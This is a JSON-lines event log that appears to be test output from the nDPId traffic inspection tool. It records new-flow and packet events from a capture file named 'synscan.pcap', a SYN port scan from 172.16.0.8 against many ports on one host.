-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsmXkAADsGc\/msEAAIQA2GNIzSBFHdUoMYAAAAAGACEAAkPgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsX+sAAC8GuYesEAAIQA2GNIzSE7rdUoMYAAAAAGACEAAU1QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsrscAADQGZausEAAIQA2GNIzSBJfdUoMYAAAAAGACBAAv+AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAspigAADAGckqsEAAIQA2GNIzSDLzdUoMYAAAAAGACBAAn0wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsFq0AADAGAcasEAAIQA2GNIzSIyndUoMYAAAAAGACBAARZgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsr38AACUGc\/OsEAAIQA2GNIzSOpvdUoMYAAAAAGACCAD18wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAs1pwAADMGPtasEAAIQA2GNIzSAEbdUoMYAAAAAGACEAAoSQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsCvQAAC8GDn+sEAAIQA2GNIzSB9PdUoMYAAAAAGACEAAgvAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsEhYAADIGBF2sEAAIQA2GNIzSBAbdUoMYAAAAAGACDAAoiQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsysMAADYGR6+sEAAIQA2GNIzSAh\/dUoMYAAAAAGACDAAqcAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAshYsAADUGjeesEAAIQA2GNIzSBGzdUoMYAAAAAGACCAAsIwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsx5MAACYGWt+sEAAIQA2GNIzS\/G\/dUoMYAAAAAGACDAAwHwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsd4EAAC8GofGsEAAIQA2GNIzSF3fdUoMYAAAAAGACEAARGAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsV8MAADAGwK+sEAAIQA2GNIzSDOTdUoMYAAAAAGACBAAnqwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsDVUAACcGFB6sEAAIQA2GNIzSAN7dUoMYAAAAAGACEAAnsQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsTlwAADEGyRasEAAIQA2GNIzSIALdUoMYAAAAAGACCAAQjQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsKmwAACoG9AasEAAIQA2GNIzSKYTdUoMYAAAAAGACDAADCwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAscZcAACYGsNusEAAIQA2GNIzSEVzdUoMYAAAAAGACDAAbMwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAslUQAADkGei6sEAAIQA2GNIzSAE\/dUoMYAAAAAGACCAAwQAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsfT0AADYGlTWsEAAIQA2GNIzSHwLdUoMYAAAAAGACDAANjQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAseaIAAC4GoNCsEAAIQA2GNIzSBAjdUoMYAAAAAGACDAAohwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsHtMAACcGAqCsEAAIQA2GNIzTCEfdU4MZAAAAAGACEAAgRQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsp1MAACsGdh+sEAAIQA2GNIzTH5XdU4MZAAAAAGACEAAI9wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsELoAACkGDrmsEAAIQA2GNIzTFTjdU4MZAAAAAGACCAAbVAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsMaIAACcG79CsEAAIQA2GNIzTEV7dU4MZAAAAAGACEAAXLgAAAgQFtA=="} 